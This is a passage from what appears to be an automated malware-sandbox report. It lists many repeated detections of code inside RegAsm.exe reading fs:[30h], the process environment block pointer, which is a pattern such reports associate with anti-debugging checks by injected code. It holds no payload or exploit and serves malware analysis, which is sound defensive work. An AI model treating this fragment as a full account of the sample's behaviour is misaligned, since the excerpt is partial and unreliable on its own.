            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBC460 mov ecx, dword ptr fs:[00000030h]7_2_02FBC460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FEA456 mov eax, dword ptr fs:[00000030h]7_2_02FEA456
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2645D mov eax, dword ptr fs:[00000030h]7_2_02F2645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5245A mov eax, dword ptr fs:[00000030h]7_2_02F5245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E443 mov eax, dword ptr fs:[00000030h]7_2_02F6E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E443 mov eax, dword ptr fs:[00000030h]7_2_02F6E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E443 mov eax, dword ptr fs:[00000030h]7_2_02F6E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E443 mov eax, dword ptr fs:[00000030h]7_2_02F6E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E443 mov eax, dword ptr fs:[00000030h]7_2_02F6E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E443 mov eax, dword ptr fs:[00000030h]7_2_02F6E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E443 mov eax, dword ptr fs:[00000030h]7_2_02F6E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E443 mov eax, dword ptr fs:[00000030h]7_2_02F6E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6A430 mov eax, dword ptr fs:[00000030h]7_2_02F6A430
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2E420 mov eax, dword ptr fs:[00000030h]7_2_02F2E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2E420 mov eax, dword ptr fs:[00000030h]7_2_02F2E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2E420 mov eax, dword ptr fs:[00000030h]7_2_02F2E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2C427 mov eax, dword ptr fs:[00000030h]7_2_02F2C427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB6420 mov eax, dword ptr fs:[00000030h]7_2_02FB6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB6420 mov eax, dword ptr fs:[00000030h]7_2_02FB6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB6420 mov eax, dword ptr fs:[00000030h]7_2_02FB6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB6420 mov eax, dword ptr fs:[00000030h]7_2_02FB6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB6420 mov eax, dword ptr fs:[00000030h]7_2_02FB6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB6420 mov eax, dword ptr fs:[00000030h]7_2_02FB6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB6420 mov eax, dword ptr fs:[00000030h]7_2_02FB6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F68402 mov eax, dword ptr fs:[00000030h]7_2_02F68402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F68402 mov eax, dword ptr fs:[00000030h]7_2_02F68402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F68402 mov eax, dword ptr fs:[00000030h]7_2_02F68402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]7_2_02F5E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]7_2_02F5E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]7_2_02F5E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]7_2_02F5E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]7_2_02F5E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]7_2_02F5E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]7_2_02F5E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]7_2_02F5E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F325E0 mov eax, dword ptr fs:[00000030h]7_2_02F325E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6C5ED mov eax, dword ptr fs:[00000030h]7_2_02F6C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6C5ED mov eax, dword ptr fs:[00000030h]7_2_02F6C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F365D0 mov eax, dword ptr fs:[00000030h]7_2_02F365D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]7_2_02F6A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]7_2_02F6A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E5CF mov eax, dword ptr fs:[00000030h]7_2_02F6E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E5CF mov eax, dword ptr fs:[00000030h]7_2_02F6E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F545B1 mov eax, dword ptr fs:[00000030h]7_2_02F545B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F545B1 mov eax, dword ptr fs:[00000030h]7_2_02F545B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB05A7 mov eax, dword ptr fs:[00000030h]7_2_02FB05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB05A7 mov eax, dword ptr fs:[00000030h]7_2_02FB05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB05A7 mov eax, dword ptr fs:[00000030h]7_2_02FB05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E59C mov eax, dword ptr fs:[00000030h]7_2_02F6E59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F32582 mov eax, dword ptr fs:[00000030h]7_2_02F32582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F32582 mov ecx, dword ptr fs:[00000030h]7_2_02F32582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F64588 mov eax, dword ptr fs:[00000030h]7_2_02F64588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6656A mov eax, dword ptr fs:[00000030h]7_2_02F6656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6656A mov eax, dword ptr fs:[00000030h]7_2_02F6656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6656A mov eax, dword ptr fs:[00000030h]7_2_02F6656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F38550 mov eax, dword ptr fs:[00000030h]7_2_02F38550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F38550 mov eax, dword ptr fs:[00000030h]7_2_02F38550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40535 mov eax, dword ptr fs:[00000030h]7_2_02F40535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40535 mov eax, dword ptr fs:[00000030h]7_2_02F40535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40535 mov eax, dword ptr fs:[00000030h]7_2_02F40535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40535 mov eax, dword ptr fs:[00000030h]7_2_02F40535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40535 mov eax, dword ptr fs:[00000030h]7_2_02F40535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40535 mov eax, dword ptr fs:[00000030h]7_2_02F40535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E53E mov eax, dword ptr fs:[00000030h]7_2_02F5E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E53E mov eax, dword ptr fs:[00000030h]7_2_02F5E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E53E mov eax, dword ptr fs:[00000030h]7_2_02F5E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E53E mov eax, dword ptr fs:[00000030h]7_2_02F5E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E53E mov eax, dword ptr fs:[00000030h]7_2_02F5E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC6500 mov eax, dword ptr fs:[00000030h]7_2_02FC6500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004B00 mov eax, dword ptr fs:[00000030h]7_2_03004B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6AAEE mov eax, dword ptr fs:[00000030h]7_2_02F6AAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6AAEE mov eax, dword ptr fs:[00000030h]7_2_02F6AAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F30AD0 mov eax, dword ptr fs:[00000030h]7_2_02F30AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F64AD0 mov eax, dword ptr fs:[00000030h]7_2_02F64AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F64AD0 mov eax, dword ptr fs:[00000030h]7_2_02F64AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F86ACC mov eax, dword ptr fs:[00000030h]7_2_02F86ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F86ACC mov eax, dword ptr fs:[00000030h]7_2_02F86ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F86ACC mov eax, dword ptr fs:[00000030h]7_2_02F86ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F38AA0 mov eax, dword ptr fs:[00000030h]7_2_02F38AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F38AA0 mov eax, dword ptr fs:[00000030h]7_2_02F38AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03002B57 mov eax, dword ptr fs:[00000030h]7_2_03002B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03002B57 mov eax, dword ptr fs:[00000030h]7_2_03002B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03002B57 mov eax, dword ptr fs:[00000030h]7_2_03002B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03002B57 mov eax, dword ptr fs:[00000030h]7_2_03002B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F86AA4 mov eax, dword ptr fs:[00000030h]7_2_02F86AA4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F68A90 mov edx, dword ptr fs:[00000030h]7_2_02F68A90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FACA72 mov eax, dword ptr fs:[00000030h]7_2_02FACA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FACA72 mov eax, dword ptr fs:[00000030h]7_2_02FACA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6CA6F mov eax, dword ptr fs:[00000030h]7_2_02F6CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6CA6F mov eax, dword ptr fs:[00000030h]7_2_02F6CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6CA6F mov eax, dword ptr fs:[00000030h]7_2_02F6CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDEA60 mov eax, dword ptr fs:[00000030h]7_2_02FDEA60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36A50 mov eax, dword ptr fs:[00000030h]7_2_02F36A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36A50 mov eax, dword ptr fs:[00000030h]7_2_02F36A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36A50 mov eax, dword ptr fs:[00000030h]7_2_02F36A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36A50 mov eax, dword ptr fs:[00000030h]7_2_02F36A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36A50 mov eax, dword ptr fs:[00000030h]7_2_02F36A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36A50 mov eax, dword ptr fs:[00000030h]7_2_02F36A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36A50 mov eax, dword ptr fs:[00000030h]7_2_02F36A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40A5B mov eax, dword ptr fs:[00000030h]7_2_02F40A5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40A5B mov eax, dword ptr fs:[00000030h]7_2_02F40A5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F54A35 mov eax, dword ptr fs:[00000030h]7_2_02F54A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F54A35 mov eax, dword ptr fs:[00000030h]7_2_02F54A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6CA38 mov eax, dword ptr fs:[00000030h]7_2_02F6CA38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6CA24 mov eax, dword ptr fs:[00000030h]7_2_02F6CA24
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5EA2E mov eax, dword ptr fs:[00000030h]7_2_02F5EA2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBCA11 mov eax, dword ptr fs:[00000030h]7_2_02FBCA11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F38BF0 mov eax, dword ptr fs:[00000030h]7_2_02F38BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F38BF0 mov eax, dword ptr fs:[00000030h]7_2_02F38BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F38BF0 mov eax, dword ptr fs:[00000030h]7_2_02F38BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5EBFC mov eax, dword ptr fs:[00000030h]7_2_02F5EBFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]7_2_02FBCBF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]7_2_02FDEBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F50BCB mov eax, dword ptr fs:[00000030h]7_2_02F50BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F50BCB mov eax, dword ptr fs:[00000030h]7_2_02F50BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F50BCB mov eax, dword ptr fs:[00000030h]7_2_02F50BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F30BCD mov eax, dword ptr fs:[00000030h]7_2_02F30BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F30BCD mov eax, dword ptr fs:[00000030h]7_2_02F30BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F30BCD mov eax, dword ptr fs:[00000030h]7_2_02F30BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40BBE mov eax, dword ptr fs:[00000030h]7_2_02F40BBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40BBE mov eax, dword ptr fs:[00000030h]7_2_02F40BBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]7_2_02FE4BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]7_2_02FE4BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004A80 mov eax, dword ptr fs:[00000030h]7_2_03004A80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2CB7E mov eax, dword ptr fs:[00000030h]7_2_02F2CB7E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F28B50 mov eax, dword ptr fs:[00000030h]7_2_02F28B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDEB50 mov eax, dword ptr fs:[00000030h]7_2_02FDEB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE4B4B mov eax, dword ptr fs:[00000030h]7_2_02FE4B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE4B4B mov eax, dword ptr fs:[00000030h]7_2_02FE4B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC6B40 mov eax, dword ptr fs:[00000030h]7_2_02FC6B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC6B40 mov eax, dword ptr fs:[00000030h]7_2_02FC6B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFAB40 mov eax, dword ptr fs:[00000030h]7_2_02FFAB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD8B42 mov eax, dword ptr fs:[00000030h]7_2_02FD8B42
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5EB20 mov eax, dword ptr fs:[00000030h]7_2_02F5EB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5EB20 mov eax, dword ptr fs:[00000030h]7_2_02F5EB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF8B28 mov eax, dword ptr fs:[00000030h]7_2_02FF8B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF8B28 mov eax, dword ptr fs:[00000030h]7_2_02FF8B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAEB1D mov eax, dword ptr fs:[00000030h]7_2_02FAEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAEB1D mov eax, dword ptr fs:[00000030h]7_2_02FAEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAEB1D mov eax, dword ptr fs:[00000030h]7_2_02FAEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAEB1D mov eax, dword ptr fs:[00000030h]7_2_02FAEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAEB1D mov eax, dword ptr fs:[00000030h]7_2_02FAEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAEB1D mov eax, dword ptr fs:[00000030h]7_2_02FAEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAEB1D mov eax, dword ptr fs:[00000030h]7_2_02FAEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAEB1D mov eax, dword ptr fs:[00000030h]7_2_02FAEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAEB1D mov eax, dword ptr fs:[00000030h]7_2_02FAEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]7_2_02F6C8F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]7_2_02F6C8F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]7_2_02FFA8E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]7_2_02F5E8C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004940 mov eax, dword ptr fs:[00000030h]7_2_03004940
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBC89D mov eax, dword ptr fs:[00000030h]7_2_02FBC89D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F30887 mov eax, dword ptr fs:[00000030h]7_2_02F30887
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBE872 mov eax, dword ptr fs:[00000030h]7_2_02FBE872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBE872 mov eax, dword ptr fs:[00000030h]7_2_02FBE872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC6870 mov eax, dword ptr fs:[00000030h]7_2_02FC6870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC6870 mov eax, dword ptr fs:[00000030h]7_2_02FC6870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F60854 mov eax, dword ptr fs:[00000030h]7_2_02F60854
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F34859 mov eax, dword ptr fs:[00000030h]7_2_02F34859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F34859 mov eax, dword ptr fs:[00000030h]7_2_02F34859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F42840 mov ecx, dword ptr fs:[00000030h]7_2_02F42840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F52835 mov eax, dword ptr fs:[00000030h]7_2_02F52835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F52835 mov eax, dword ptr fs:[00000030h]7_2_02F52835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F52835 mov eax, dword ptr fs:[00000030h]7_2_02F52835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F52835 mov ecx, dword ptr fs:[00000030h]7_2_02F52835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F52835 mov eax, dword ptr fs:[00000030h]7_2_02F52835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F52835 mov eax, dword ptr fs:[00000030h]7_2_02F52835
